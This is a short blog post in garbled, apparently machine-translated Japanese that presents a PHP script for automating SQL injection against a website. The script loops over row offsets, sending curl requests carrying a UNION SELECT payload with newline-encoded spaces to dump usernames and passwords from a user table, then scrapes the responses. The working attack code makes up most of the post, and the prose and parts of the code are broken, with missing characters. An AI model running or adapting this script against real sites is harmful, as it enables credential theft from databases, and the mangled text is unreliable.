phpスクリプトを書いて浸透テストを補助します

2614 ワード

注入はいくつかのデータを登って、それから書く小さなスクリプトのため、スクリプトを書いて浸透を補助することができて、マイルストーンです.ハハハ
php 
$num = 1;
while ($num <= 39) {
$web_url =  "http://www.xxx.com/shownews.asp?id=626%0AUNION%0ASELECT%0Atop%0A1%0A1,user_username,3,user_password,5,6%0Afrom%0A(select%0Atop%0A1%0Auser_username,user_phone%0Afrom%0A(select%0Atop%0A".$num."%0Auser_username,user_phone%0Afrom%0Azy_user%0Awhere%0A1=1%0Aorder%0Aby%0Auser_username)%0At%0Aorder%0Aby%0Auser_username%0Adesc)t";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,$web_url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
$html_code = curl_exec($curl);
$re = "/
[\s\S]*div>/U";//U if(preg_match_all($re, $html_code, $arr)){ print_r($arr[0]); } curl_close($curl); $num = $num + 1; echo "
"; } ?>

。 。 html 。

  

wtmpvp


の に があり、スペースがたくさんあることがわかります.
それから いても は けない. は まずい.
 
:https://www.cnblogs.com/xishaonian/p/6602299.html